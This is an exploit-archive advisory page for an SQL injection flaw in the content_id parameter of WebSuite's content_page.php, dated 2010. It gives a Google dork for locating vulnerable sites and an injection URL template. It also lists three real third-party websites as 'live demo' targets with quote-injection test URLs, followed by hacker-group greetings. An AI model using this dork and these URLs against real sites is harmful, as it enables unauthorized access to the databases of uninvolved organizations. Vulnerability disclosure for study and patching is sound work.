WebSuite content_id SQL Injection Vulnerability

2010.09.22
Credit: jos_ali_joe
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"content_page.php?content_id\"

============================================================== WebSuite content_id SQL Injection Vulnerability ============================================================== ###################################################################### # Exploit Title: WebSuite content_id SQL Injection Vulnerability # Date: september 21, 2010 # Author: jos_ali_joe # Category? : Web Apps # Google Dork : inurl:"content_page.php?content_id" ###################################################################### [$] ExPLo!T : http://www.example.com/html/content_page.php?content_id={sql injection} [$] L!ve Demo : http://www.americanarrowcorp.com/html/content_page.php?content_id=21%27&nav_id=3& [$] L!ve Demo : http://www.gilmorecarmuseum.org/html/content_page.php?content_id=7%27& [$] L!ve Demo : http://www.firemuseum.com/html/content_page.php?content_id=11%27&nav_id=3& ###################################################################### Thanks : ./kaMtiEz - ibl13Z - Xrobot - tukulesto - N4ck0 - R3m1ck - jundab - asickboys- Vyc0d - Yur4kha ./ArRay - akatsuchi - K4pt3N - Gameover - antitos - yuki - pokeng - ffadill - TeRRenJr - aphe-aphe ./Kiddies - Chaer.newbie - Gunslinger_ - Mywisdom - whitehat - Petimati - hakz - Virgi - Anharku - TeRRenJr Greets For : ./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker My Team : ./Indonesian Coder


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top